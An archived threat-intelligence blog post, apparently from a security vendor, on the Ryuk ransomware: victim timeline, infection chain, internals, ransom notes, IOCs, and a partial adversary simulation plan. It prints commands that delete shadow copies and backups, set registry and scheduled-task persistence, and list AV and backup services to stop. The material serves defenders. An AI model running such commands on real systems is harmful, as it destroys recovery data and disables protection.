{
	"id": "39ad7cc1-edff-4221-bc8e-68285a04e52b",
	"created_at": "2026-04-06T00:19:05.43632Z",
	"updated_at": "2026-04-10T03:37:26.204876Z",
	"deleted_at": null,
	"sha1_hash": "958b5749de0fa782cddb77262ee59443501bdb95",
	"title": "Ryuk Ransomware: History, Timeline, and Adversary Simulation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 987733,
	"plain_text": "Ryuk Ransomware: History, Timeline, and Adversary Simulation\r\nArchived: 2026-04-05 20:02:15 UTC\r\nRyuk Ransomware Group\r\nRyuk is the name of a ransomware family, first introduced in August 2018. Once known as a popular Japanese\r\nfictional character, became one of the most vicious ransomware families ever known to humanity, targeting\r\ngovernments, healthcare, education centres, manufacturing and technology organizations. Ryuk ransomware\r\nacquired a reputation of being one of the most notorious ransomware within a short span of 15 months, with its\r\nterror looming over large organizations. Victims include EMCOR, UHS hospitals, and several newspapers. It\r\nwas estimated that Ryuk was able to generate a revenue of $61 million for its operators between February 2018\r\nand October 2019.\r\nWith its first appearance in August 2018, Ryuk gained attention by targeting the operations of Tribune Publishing\r\nnewspapers during the Christmas season of 2018. Initially, what looked like a server outage was the outcome of a\r\ntargeted malware attack, with Ryuk reinfecting the network because the security patches failed to contain the\r\nmalware post quarantine. The primary motive of this ransomware variant is to ensure maximum target file\r\nencryption to hold a massive amount at ransom. Additionally, Ryuk can identify and encrypt network drivers and\r\nincludes system shadow copies, making it impossible to recover from an attack without external backups or\r\nrollback technology.\r\nThis blog will entail the complete attack flow of the Ryuk ransomware group, allowing security practitioners to\r\ntest their cybersecurity posture against the full range of techniques and procedures that Ryuk used. 
The techniques\r\nand procedures covered in this blog are aggregated from various sources and reports compiled to provide the\r\nreader with a good overview of the Ryuk TTPs.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 1 of 31\n\nRyuk Over Time\r\nBelow you will find a brief timeline of incidents involving the Ryuk ransomware group[6]:\r\nDecember 2018 – Tribune Publishing attack\r\nMarch 2019 – Jackson County's infrastructure was attacked. Damages: $400,000 (22 BTC).\r\nApril 2019 – Imperial County’s IT infrastructure gets hit by Ryuk. The attackers demanded $1.2 million\r\n(65 BTC). Victims refused to pay.\r\nJune 2019 – Lake City systems locked by ransomware. Victims had to pay $460,000 (25 BTC) to regain\r\ncontrol over their systems.\r\nJuly 2019 – La Porte County, the Ryuk ransomware hit public institutions. Victims had to pay $130,000 (7\r\nBTC).\r\nAugust 2019 – Rockville Centre school district affected by Ryuk. The municipality had to pay $100,000 (5\r\nBTC) to regain control.\r\nOctober 2019 – Ryuk creators take down a hospital chain administrated by the National Veterinary\r\nAssociates. Over 400 clinics experienced downtimes in payment systems and patient curation systems.\r\nNovember 2019 – Ryuk operators launch attacks against several HVTs: Louisiana Office of Technology\r\nServices, Prosegur (i.e. Spanish security company), Cadena SER (the largest radio station in Spain), and T-System (E2E healthcare and emergency solutions providers).\r\nJanuary 2020 – Ryuk operators attacked gas and oil facilities. In addition, the same operators were found to\r\nbe involved in several other incidents targeting healthcare providers.\r\nSeptember 2020 – Universal Health Services (UHS) healthcare providers have reportedly shut down\r\nsystems at healthcare facilities after a Ryuk ransomware attack. 
The incident resulted in about $67 million\r\nin lost operating income, labour expenses, and overall recovery costs.\r\nJanuary 2021 – A new version with “worm-like” capabilities was identified. The new Ryuk variant can\r\nspread automatically/without intervention through infected networks.\r\nMarch 2021 – Ryuk targeted the systems of SEPE, the Spanish government agency for labour. The systems\r\nwere taken down following a ransomware attack that affected more than 700 agency offices across Spain.\r\nApril 2021 – New Ryuk hacking techniques were revealed. The threat actors' favourite initial infection\r\nvector continues to be the targeted phishing emails for malware delivery.\r\nMay 2021 – Ryuk ransomware infects Bio Research Institute after a student installs pirated software. The\r\nattack occurred because the student didn’t want to pay for a license, causing a week’s research data.\r\nMoving forward, the Ryuk Infection chain and attack flow **already part of the FourCore ATTACK Security\r\nValidation Platform will enable security practitioners to:\r\nEvaluate their security controls against the real-world tactics provinding the significance of its real-world\r\nimpact.\r\nAssess the security posture against the tactics, techniques and procedures (TTPs) used by the WIZARD\r\nGroup's Ryuk variant\r\nContinuously validate detection and prevention pipelines against the destructive actions this ransomware\r\nperforms\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 2 of 31\n\nThreat Intel: Ryuk\r\nThe next part of this blog will cover the Ryuk infection chain and the public reports available:\r\nRyuk Ransomware Infection Chain\r\nThe operators behind the Ryuk ransomware take a targeted approach to select and infect their victims. 
Rather than\r\nattempting to infect many computers and asking a relatively small ransom (like WannaCry), campaigns using the\r\nRyuk ransomware focus on a single organization and have an extremely high asking price for data recovery. Ryuk\r\nis a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It\r\nhas been observed to be used to attack companies or professional environments. Cybersecurity experts figured out\r\nthat Ryuk and Hermes ransomware shares pieces of code.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 3 of 31\n\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 4 of 31\n\nRyuk's Latest Attack Timeline (source: thedfirreport.com/2020/10/08/ryuks-return/)\r\nRyuk Ransomware Attack Mechanism\r\nThe table shown below covers the MITRE ATT\u0026CK tactics, techniques, and procedures used in the Ryuk's attack\r\ncycle:\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 5 of 31\n\nRyuk Actions mapped to Mitre ATT\u0026CK\r\nRyuk has been known to be a part of a more significant \"Triple Threat\" attack that involves Emotet and\r\nTrickBot.\r\nInfection:\r\nRyuk is spread via very targeted means. These include using tailored spear phishing emails and exploiting\r\ncompromised credentials to remotely access systems via the Remote Desktop Protocol (RDP).\r\nThe delivery method for Ryuk is through spam emails like various other malware attacks, often sent\r\nthrough spoofed addresses, to avoid raising suspicion.\r\nA spearphishing email may carry Ryuk directly or be the first in a series of malware infections. 
For\r\nexample, Emotet, TrickBot, and Ryuk are common combinations.\r\nThe attack chain begins when the user opens a weaponized Microsoft Office document attached to a\r\nphishing email.\r\nOpening the document causes a malicious macro to execute a PowerShell command that attempts to\r\ndownload the banking Trojan Emotet.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 6 of 31\n\nWith RDP, a cybercriminal can install and execute Ryuk directly on the target machine or leverage their\r\naccess to reach and infect other, more valuable systems on the network.\r\nDelivery:\r\nThis Emotet Trojan can download additional malware onto an infected machine that retrieves and executes\r\nTrickbot, which acts as spyware.\r\nCollection:\r\nThis Trickbot spyware collects admin credentials, browser passwords, credit cards, network discovery, and\r\nother intel.\r\nLateral Movement:\r\nAttackers use the data collected in the previous stage to move to critical assets connected to the network\r\nlaterally. The attack chain concludes when the attackers execute Ryuk on these assets. This step entirely\r\ndepends on whether the infection has spread to enough assets to inflict maximum impact to get enough\r\nleverage to demand a large sum. Thus, it becomes the deciding factor for whether the Ryuk ransomware\r\nshould be deployed.\r\nExecution:\r\nRyuk uses a combination of encryption algorithms, including a symmetric algorithm (AES-256) and an\r\nasymmetric one (RSA 4096). The ransomware encrypts a file with the symmetric algorithm and includes a\r\ncopy of the symmetric encryption key encrypted with the RSA public key.\r\nRyuk deliberately avoids encrypting certain file types (including .exe and .dll) and files in specific folders\r\non the system. 
Thus decreasing the probability that Ryuk will break an infected computer, making file\r\nretrieval more difficult or impossible even if a ransom is paid.\r\nDecryption:\r\nUpon payment of the ransom, the Ryuk operator provides:\r\nA copy of the corresponding RSA private key.\r\nEnabling decryption of the symmetric encryption key and.\r\nUsing it.\r\nThe encrypted files.\r\nRansom Note:\r\nBeing notoriously known to be one of the most expensive ransomware variants, with average ransom demands\r\nreaching higher than $100,000 USD.\r\nRyuk ransom notes contain an email address where victims can communicate with the ransomware operators to\r\nreceive instructions on how to pay the ransom. However, this should be noted that there is no guarantee even if\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 7 of 31\n\nyou submit the ransom. In most of the observed cases, the ransomware operators will take the ransom without\r\nreturning access to the files. Paying a ransom demand should result in the cybercriminal sending a\r\ndecryptor/decryption key.\r\n1Your network has been penetrated.\r\n2\r\n3All files on each host in the network have been encrypted with a strong algorithm.\r\n4\r\n5Backups were either encrypted\r\n6Shadow copies are also removed, so F8 or any other methods may damage encrypted data but not recover.\r\n7\r\n8We exclusively have decryption software for your situation.\r\n9More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decode\r\n10\r\n11No decryption software is available in the public.\r\n12Antivirus companies, researchers, IT specialists, and no other persons cant help you\r\n13encrypt the data.\r\n14\r\n15DO NOT RESET OR SHUTDOWN - files may be damaged.\r\n16DO NOT DELETE readme files.\r\n17\r\n18To confirm our honest intentions. 
Send 2 different random files, and you will get it\r\n19decrypted.\r\n20\r\n21It can be from different computers on your network to be sure that one key decrypts everything.\r\n22\r\n232 files we unlock for free\r\n24\r\n25To get info (decrypt your files) contact us at\r\n26CliffordGolden93@protonmail.com\r\n27or\r\n28CliffordGolden93@tutanota.com\r\n29\r\n30You will receive BTC address for payment in the reply letter\r\n31\r\n32Ryuk\r\n33\r\n34No system is safe\r\nRansom Payment:\r\nThe ransom demand varies significantly based on observed transactions to known Ryuk BTC addresses. This\r\nsuggests that WIZARD SPIDER calculates the ransom amount based on the size and value of the victim\r\norganization. From the early data available, the observed ransom amount resided between 1.7-99 BTC.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 8 of 31\n\n1Your network has been penetrated.\r\n2\r\n3All files on each host in the network have been encrypted with a strong algorithm.\r\n4Backups were either encrypted or deleted or backup disks were formatted.\r\n5\r\n6Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover.\r\n7\r\n8We exclusively have decryption software for your situation\r\n9No decryption software is available in the public.\r\n10\r\n11DO NOT RESET OR SHUTDOWN - files may be damaged.\r\n12DO NOT RENAME OR MOVE the encrypted and readme files.\r\n13DO NOT DELETE readme files.\r\n14This may lead to the impossibility of recovery of the certain files.\r\n15\r\n16To get info (decrypt your files) contact us at\r\n17KurtSchweickardt@protonmail.com\r\n18or\r\n19KurtSchweickardt@tutanota.com\r\n20\r\n21BTC wallet:\r\n2214hVKm7Ft2rxDBFTNKKRC3KGStMGp2Adhk\r\n23\r\n24Ryuk\r\n25No system is safe\r\nRYUK - Balance of shadow universe\r\nRyuk Ransomware: Analysis in Depth\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 9 of 31\n\nRyuk Infection Chain\r\nMalware Dropper and its 
shenanigans\r\nThe dropper is loaded onto the victim's machine via a PowerShell, C2C retrieval. Once the dropper lands on the\r\ntarget asset, it will check the MajorVersion property to determine the target operating system. If MajorVersion is\r\nequal to 5, then the dropper will place the ransomware executable into the C:\\Documents and Setting\\Default\r\nUser folder. That's the default ransomware download file for Windows Server 2003, XP, and Windows 2000.\r\nOtherwise, it drops it at C:\\users\\Public\\ . In case of a lookup/file creation failure, the dropper drops Ryuk\r\nmalware in the execution directory of the dropper itself. The name of the dropped executable is five randomly\r\ngenerated characters.\r\nNext, it determines the target system's architecture by calling the IsWow64Process() API.\r\nBefore the dropper exits, it launches the second stage executor using the ShellExecuteW API and passes its path\r\nas a command line argument, deleting the dropper binary.\r\nPersistence\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 10 of 31\n\nRyuk uses the Windows Registry to ensure post-reboot execution by adding an entry to the key\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos and value set to the executable\r\npath: C:\\users\\Public\\BPWPc.exe . The instruction is /v \"svchos\"/t REG_SZ/d allows the malware to run after\r\nevery login.\r\n1C:\\Windows\\System32\\cmd.exe /C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\"\r\nPrivilege Escalation\r\nRyuk obtains further permissions by modifying the SeDebugPrivilege argument of the\r\nAdjustTokenPrivileges() API to adjust its process security access token. According to MSDN,\r\nSeDebugPrivilege is required to debug and modify the memory of a process owned by another account. 
The user\r\ncan attach a debugger to any process or kernel with this privilege.\r\nProcess Enumeration and Code Injection\r\nRyuk tries to enumerate all the running processes using the CreateToolHelp32Snapshot API and identifies the\r\nuser associated with each process (regular user/administrator/NT AUTHORITY).\r\nThis step is essential to identify the target process for injection. The code injection mechanism will ignore any\r\nsystem process named crsss.exe , lsaas.exe , explorer.exe , or anything running as NT AUTHORITY.\r\nRyuk allocates memory for its process at the target process memory space using VirtualAllocEx() , then copies\r\nand maps the packed code section into the target process's allocated virtual memory using\r\nWriteProcessMemory() API. Finally, it creates a new thread using CreateRemoteThread() to run Ryuk's thread\r\nin the injected process.\r\nDynamic Import Address Resolution\r\nIt is a commonly known practice that a static binary with many imports can look malicious from the EDRs PoV.\r\nTherefore, most malware authors resolve their function imports dynamically using LoadLibraryA() and\r\nGetProcAdress() APIs.\r\nHere is the complete list of all the APIs post-resolution:\r\n1advapi32.dll\r\n2 CryptAcquireContextW\r\n3 CryptDecrypt\r\n4 CryptDeriveKey\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 11 of 31\n\n5 CryptDestroyKey\r\n6 CryptEncrypt\r\n7 CryptExportKey\r\n8 CryptGenKey\r\n9 CryptImportKey\r\n10 GetUserNameA\r\n11 GetUserNameW\r\n12 RegCloseKey\r\n13 RegDeleteValueW\r\n14 RegOpenKeyExA\r\n15 RegOpenKeyExW\r\n16 RegQueryValueExA\r\n17 RegSetValueExW\r\n18kernel32.dll\r\n19 CloseHandle\r\n20 CopyFileA\r\n21 CopyFileW\r\n22 CreateDirectoryW\r\n23 CreateFileA\r\n24 CreateFileW\r\n25 CreateProcessA\r\n26 CreateProcessW\r\n27 DeleteFileW\r\n28 ExitProcess\r\n29 FindClose\r\n30 FindFirstFileW\r\n31 FindNextFileW\r\n32 FreeLibrary\r\n33 GetCommandLineW\r\n34 GetCurrentProcess\r\n35 GetDriveTypeW\r\n36 
GetFileAttributesA\r\n37 GetFileAttributesW\r\n38 GetFileSize\r\n39 GetLogicalDrives\r\n40 GetModuleFileNameA\r\n41 GetModuleFileNameW\r\n42 GetModuleHandleA\r\n43 GetStartupInfoW\r\n44 GetTickCount\r\n45 GetVersionExW\r\n46 GetWindowsDirectoryW\r\n47 GlobalAlloc\r\n48 LoadLibraryA\r\n49 ReadFile\r\n50 SetFileAttributesA\r\n51 SetFileAttributesW\r\n52 SetFilePointer\r\n53 Sleep\r\n54 VirtualAlloc\r\n55 VirtualFree\r\n56 WinExec\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 12 of 31\n\n57 Wow64DisableWow64FsRedirection\r\n58 Wow64RevertWow64FsRedirection\r\n59 WriteFile\r\n60ole32.dll\r\n61 CoCreateInstance\r\n62 CoInitialize\r\n63Shell32.dll\r\n64 ShellExecuteA\r\n65 ShellExecuteW\r\n66mpr.dll\r\n67 WNetCloseEnum\r\n68 WNetEnumResourceW\r\n69 WNetOpenEnumW\r\n70Iphlpapi.dll\r\n71 GetIpNetTable\r\nHunting Processes and Services:\r\nRyuk ransomware will kill or put to sleep up to 180 system and AV-related services and up to 40 processes. The\r\nservices and processes are killed using the net stop and taskkill /IM commands.\r\nTargetted Services:\r\n1 Acronis VSS Provider\r\n2 Enterprise Client Service\r\n3 Sophos Agent\r\n4 Sophos AutoUpdate Service\r\n5 Sophos Clean Service\r\n6 Sophos Device Control Service\r\n7 Sophos File Scanner Service\r\n8 Sophos Health Service\r\n9 Sophos MCS Agent\r\n10 Sophos MCS Client\r\n11 Sophos Message Router\r\n12 Sophos Safestore Service\r\n13 Sophos System Protection Service\r\n14 Sophos Web Control Service\r\n15 SQLsafe Backup Service\r\n16 SQLsafe Filter Service\r\n17 Symantec System Recovery\r\n18 Veeam Backup Catalog Data Service\r\n19 AcronisAgent\r\n20 AcrSch2Svc\r\n21 Antivirus\r\n22 ARSM\r\n23 BackupExecAgentAccelerator\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 13 of 31\n\n24 BackupExecAgentBrowser\r\n25 BackupExecDeviceMediaService\r\n26 BackupExecJobEngine\r\n27 BackupExecManagementService\r\n28 BackupExecRPCService\r\n29 BackupExecVSSProvider\r\n30 bedbg\r\n31 
DCAgent\r\n32 EPSecurityService\r\n33 EPUpdateService\r\n34 EraserSvc11710\r\n35 EsgShKernel\r\n36 FA_Scheduler\r\n37 IISAdmin\r\n38 IMAP4Svc\r\n39 macmnsvc\r\n40 masvc\r\n41 MBAMService\r\n42 MBEndpointAgent\r\n43 McAfeeEngineService\r\n44 McAfeeFramework\r\n45 McAfeeFrameworkMcAfeeFramework\r\n46 McShield\r\n47 McTaskManager\r\n48 mfemms\r\n49 mfevtp\r\n50 MMS\r\n51 mozyprobackup\r\n52 MsDtsServer\r\n53 MsDtsServer100\r\n54 MsDtsServer110\r\n55 MSExchangeES\r\n56 MSExchangeIS\r\n57 MSExchangeMGMT\r\n58 MSExchangeMTA\r\n59 MSExchangeSA\r\n60 MSExchangeSRS\r\n61 MSOLAP$SQL_2008\r\n62 MSOLAP$SYSTEM_BGC\r\n63 MSOLAP$TPS\r\n64 MSOLAP$TPSAMA\r\n65 MSSQL$BKUPEXEC\r\n66 MSSQL$ECWDB2\r\n67 MSSQL$PRACTICEMGT\r\n68 MSSQL$PRACTTICEBGC\r\n69 MSSQL$PROFXENGAGEMENT\r\n70 MSSQL$SBSMONITORING\r\n71 MSSQL$SHAREPOINT\r\n72 MSSQL$SQL_2008\r\n73 MSSQL$SYSTEM_BGC\r\n74 MSSQL$TPS\r\n75 MSSQL$TPSAMA\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 14 of 31\n\n76 MSSQL$VEEAMSQL2008R2\r\n77 MSSQL$VEEAMSQL2012\r\n78 MSSQLFDLauncher\r\n79 MSSQLFDLauncher$PROFXENGAGEMENT\r\n80 MSSQLFDLauncher$SBSMONITORING\r\n81 MSSQLFDLauncher$SHAREPOINT\r\n82 MSSQLFDLauncher$SQL_2008\r\n83 MSSQLFDLauncher$SYSTEM_BGC\r\n84 MSSQLFDLauncher$TPS\r\n85 MSSQLFDLauncher$TPSAMA\r\n86 MSSQLSERVER\r\n87 MSSQLServerADHelper100\r\n88 MSSQLServerOLAPService\r\n89 MySQL80\r\n90 MySQL57\r\n91 ntrtscan\r\n92 OracleClientCache80\r\n93 PDVFSService\r\n94 POP3Svc\r\n95 ReportServer\r\n96 ReportServer$SQL_2008\r\n97 ReportServer$SYSTEM_BGC\r\n98 ReportServer$TPS\r\n99 ReportServer$TPSAMA\r\n100 RESvc\r\n101 sacsvr\r\n102 SamSs\r\n103 SAVAdminService\r\n104 SAVService\r\n105 SDRSVC\r\n106 SepMasterService\r\n107 ShMonitor\r\n108 Smcinst\r\n109 SmcService\r\n110 SMTPSvc\r\n111 SNAC\r\n112 SntpService\r\n113 sophossps\r\n114 SQLAgent$BKUPEXEC\r\n115 SQLAgent$ECWDB2\r\n116 SQLAgent$PRACTTICEBGC\r\n117 SQLAgent$PRACTTICEMGT\r\n118 SQLAgent$PROFXENGAGEMENT\r\n119 SQLAgent$SBSMONITORING\r\n120 
SQLAgent$SHAREPOINT\r\n121 SQLAgent$SQL_2008\r\n122 SQLAgent$SYSTEM_BGC\r\n123 SQLAgent$TPS\r\n124 SQLAgent$TPSAMA\r\n125 SQLAgent$VEEAMSQL2008R2\r\n126 SQLAgent$VEEAMSQL2012\r\n127 SQLBrowser\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 15 of 31\n\n128 SQLSafeOLRService\r\n129 SQLSERVERAGENT\r\n130 SQLTELEMETRY\r\n131 SQLTELEMETRY$ECWDB2\r\n132 SQLWriter\r\n133 SstpSvc\r\n134 svcGenericHost\r\n135 swi_filter\r\n136 swi_service\r\n137 swi_update_64\r\n138 TmCCSF\r\n139 tmlisten\r\n140 TrueKey\r\n141 TrueKeyScheduler\r\n142 TrueKeyServiceHelper\r\n143 UI0Detect\r\n144 VeeamBackupSvc\r\n145 VeeamBrokerSvc\r\n146 VeeamCatalogSvc\r\n147 VeeamCloudSvc\r\n148 VeeamDeploymentService\r\n149 VeeamDeploySvc\r\n150 VeeamEnterpriseManagerSvc\r\n151 VeeamMountSvc\r\n152 VeeamNFSSvc\r\n153 VeeamRESTSvc\r\n154 VeeamTransportSvc\r\n155 W3Svc\r\n156 wbengine\r\n157 WRSVC\r\n158 MSSQL$VEEAMSQL2008R2\r\n159 SQLAgent$VEEAMSQL2008R2\r\n160 VeeamHvIntegrationSvc\r\n161 swi_update\r\n162 SQLAgent$CXDB\r\n163 SQLAgent$CITRIX_METAFRAME\r\n164 SQL Backups\r\n165 MSSQL$PROD\r\n166 Zoolz 2 Service\r\n167 MSSQLServerADHelper\r\n168 SQLAgent$PROD\r\n169 msftesql$PROD\r\n170 NetMsmqActivator\r\n171 EhttpSrv\r\n172 ekrn\r\n173 ESHASRV\r\n174 MSSQL$SOPHOS\r\n175 SQLAgent$SOPHOS\r\n176 AVP\r\n177 klnagent\r\n178 MSSQL$SQLEXPRESS\r\n179 SQLAgent$SQLEXPRESS\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 16 of 31\n\n180 wbengine\r\n181 kavfsslp\r\n182 KAVFSGT\r\n183 KAVFS\r\n184 mfefire\r\nTargetted Processes:\r\n1 zoolz.exe\r\n2 agntsvc.exe\r\n3 dbeng50.exe\r\n4 dbsnmp.exe\r\n5 encsvc.exe\r\n6 excel.exe\r\n7 firefoxconfig.exe\r\n8 infopath.exe\r\n9 isqlplussvc.exe\r\n10 msaccess.exe\r\n11 msftesql.exe\r\n12 mspub.exe\r\n13 mydesktopqos.exe\r\n14 mydesktopservice.exe\r\n15 mysqld.exe\r\n16 mysqld-nt.exe\r\n17 mysqld-opt.exe\r\n18 ocautoupds.exe\r\n19 ocomm.exe\r\n20 ocssd.exe\r\n21 onenote.exe\r\n22 oracle.exe\r\n23 outlook.exe\r\n24 
powerpnt.exe\r\n25 sqbcoreservice.exe\r\n26 sqlagent.exe\r\n27 sqlbrowser.exe\r\n28 sqlservr.exe\r\n29 sqlwriter.exe\r\n30 steam.exe\r\n31 synctime.exe\r\n32 tbirdconfig.exe\r\n33 thebat.exe\r\n34 thebat64.exe\r\n35 thunderbird.exe\r\n36 visio.exe\r\n37 winword.exe\r\n38 wordpad.exe\r\n39 xfssvccon.exe\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 17 of 31\n\n40 tmlisten.exe\r\n41 PccNTMon.exe\r\n42 CNTAoSMgr.exe\r\n43 Ntrtscan.exe\r\n44 mbamtray.exe\r\nShadow Copy Deletion\r\nRyuk runs a batch script in C:\\Users\\Public\\window.bat , which deletes all shadow copies and possible backups,\r\nand then deletes itself. The operations include:\r\nUsing the vssadmin resize to resize the shadow storage\r\nvssadmin Delete Shadow /all /quiet\r\nvssadmin resize is unique; in the case of any third-party backup provider, vssadmin can display an\r\nerror while trying to delete the backups indicating the presence of these backups outside the allowed\r\ncontext. Ryuk uses the above command, tasking vssadmin to delete storage when the shadow copies are\r\nresized. It forces the shadow copies to be deleted regardless of their context.\r\nThe del /s /q command deletes various files based on their extension and folder locations. Extensions include:-\r\n.vhd, .bac, .bak, .wbcat, .bfk, .set, .win, .dsk and any folder with a prefix \"Backup\" in it.\r\nEncryption\r\nWhile the goal of Ryuk is to make the most money, Ryuk does not have many safeguards to ensure the stability of\r\nthe host while encrypting the target system files. Ryuk avoids encrypting files with extensions .exe, .dll, .hrmlog\r\n(a debug log made by the Hermes Developer - plug: there are many similarities between Hermes and Ryuk, check\r\nreferences for more). While safe listing the above extensions, there is no provision to whitelist system drivers\r\n(.sys), OLE control extension (.ocx) and other executable file types. Encrypting these files could make the host\r\nunstable. 
Due to the absence of proper whitelisting, an infected machine can become unstable over time and\r\nunbootable if restarted.\r\nRyuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Without the\r\nprivate key provided by WIZARD SPIDER, the files cannot be decrypted and are unrecoverable. It starts\r\nenumerating files using FindFirstFileW() and FindNextFileW() then it passes each file name to a new\r\nencryption thread. Each encryption thread starts by generating a random 256 AES encryption key using\r\nCryptGenKey() . Unlike modern Go malware, Ryuk utilizes the Windows Crypto API for the encryption process.\r\nThen, it goes into the typical encryption loop, and the files are encrypted in chunks with a chunk size of 1000000\r\nbytes. Finally, Ryuk writes a metadata block of size 274 bytes* at the end of the file. The first *6 bytes* are the\r\nkeyword HERMES. Finally, the AES key is encrypted with an RSA public key before it's written to the end of the\r\nfile and then exported using CryptExportKey() ; this function generates 12 bytes of Blob information + 256 bytes\r\n(the encrypted key). The RSA public key is embedded in the executable. It's imported using CryptImportKey()\r\nand passed to every encryption thread. After the file has been encrypted, a file extension of .RYK is appended to\r\nthe file. All directories will have a ransom note RyukReadMe.txt written to the directory.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 18 of 31\n\nRyuk is one of the few ransomware which enumerates and encrypts network shares. It performs this operation by\r\nenumerates network shares using WNetOpenEnumW() and WNetEnumResourceA() respectively. For each network\r\nresource found, the drive path will get appended to a list separated by a semicolon. 
This list will be used later to\r\nencrypt these network shares with the same encryption process above.\r\nRyuk Ransomware - Sandbox Execution and Report\r\npowered by ANY.RUN\r\nAnalysis Report for the above execution present here.\r\nIOCs\r\nHashes:\r\nRyuk (second-stage): 8b0a5fb13309623c3518473551cb1f55d38d8450129d4a3c16b476f7b2867d7\r\nDropper: 23f8aa94ffb3c08a62735fe7fee5799880a8f322ce1d55ec49a13a3f85312db2\r\nMD5 Hashes:\r\n1cb0c1248d3899358a375888bb4e8f3fe\r\n2d4a7c85f23438de8ebb5f8d6e04e55fc\r\n33895a370b0c69c7e23ebb5ca1598525d\r\n0:00 / 5:16\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 19 of 31\n\n4567407d941d99abeff20a1b836570d30\r\n5c0d6a263181a04e9039df3372afb8016\r\nRegistry:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nEmails (primarily random):\r\n1WayneEvenson@protonmail[.]com\r\n2WayneEvenson@tutanota[.]com\r\nFiles: Ryuk drops the ransom note, RyukReadMe.html or RyukReadMe.txt, in every folder where it has encrypted\r\nfiles.\r\nRyuk Adversary Simulation Plan\r\nBased on the aggregated threat intelligence reports and mapping to the MITRE ATT\u0026CK matrix, FourCore has\r\nreleased a Ryuk Ransomware Adversary Simulation Assessment. While the payloads used by the ATTACK\r\nplatform are complex, dynamic, and native, for ease of this assessment, we will be providing Cmd/Powershell\r\ncommands to execute similar behaviour.\r\nRyuk Ransomware Assessment with FourCore ATTACK\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 20 of 31\n\nExecution\r\n1. T1059 - Command and Scripting Interpreter Ryuk has used cmd.exe to create a Registry entry to establish\r\npersistence and create directory for Ryuk AD scan.\r\n1`cmd /c mkdir %TEMP%\\ryuk`\r\n2. T1059.001 - PowerShell Ryuk uses powershell to configure the Microsoft Defender Real-Time scanning. 
It\r\nalso uses to compress files into archives.\r\n1`powershell Set-MpPreference -DisableRealtimeMonitoring $false`, `powershell \"Compress-Archive $env:TEMP\\ryuk\\\r\n3. T1059.003 - Windows Command Shell Ryuk has used cmd.exe to create a Registry entry to establish\r\npersistence.\r\n4. T1053 - Scheduled Task/Job Ryuk can remotely create a scheduled task to execute itself on a system.\r\n1`cmd /c SCHTASKS /QUERY /TN \"RyukAttack\"`\r\n5. T1053.005 - Scheduled Task/Job: Scheduled Task Ryuk can remotely create a scheduled task to execute\r\nitself on a system.\r\n1`cmd /c SCHTASKS /CREATE /SC DAILY /TN \"RyukAttack\" /TR \"C:\\Windows\\System32\\calc.exe\" /ST 11:00 /F`\r\n6. T1106 - Native API Ryuk has used multiple native APIs including ShellExecuteW to run\r\nexecutables,GetWindowsDirectoryW to create folders, and VirtualAlloc, WriteProcessMemory, and\r\nCreateRemoteThread for process injection.[1]\r\nPersistence\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 21 of 31\n\n1. T1547.001 - Registry Run Keys / Startup Folder Ryuk has used the Windows command line to create a\r\nRegistry entry under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish\r\npersistence.\r\nPrivilege Escalation\r\n1. T1055 - Process Injection Ryuk has injected itself into remote processes to encrypt files using a\r\ncombination of VirtualAlloc , WriteProcessMemory , and CreateRemoteThread .\r\n2. T1134 - Access Token Manipulation Ryuk has attempted to adjust its token privileges to have the\r\nSeDebugPrivilege .\r\nDefense Evasion\r\n1. T1140 - Deobfuscate/Decode Files or Information Ryuk uncompresses the dowloaded archive in a\r\ntemporary directory.\r\n1`cmd /c powershell -Command Expand-Archive \"$env:TEMP\\ryuk\\AdFind.zip\" -DestinationPath \"$env:TEMP\\ryuk\\\"`\r\n2. 
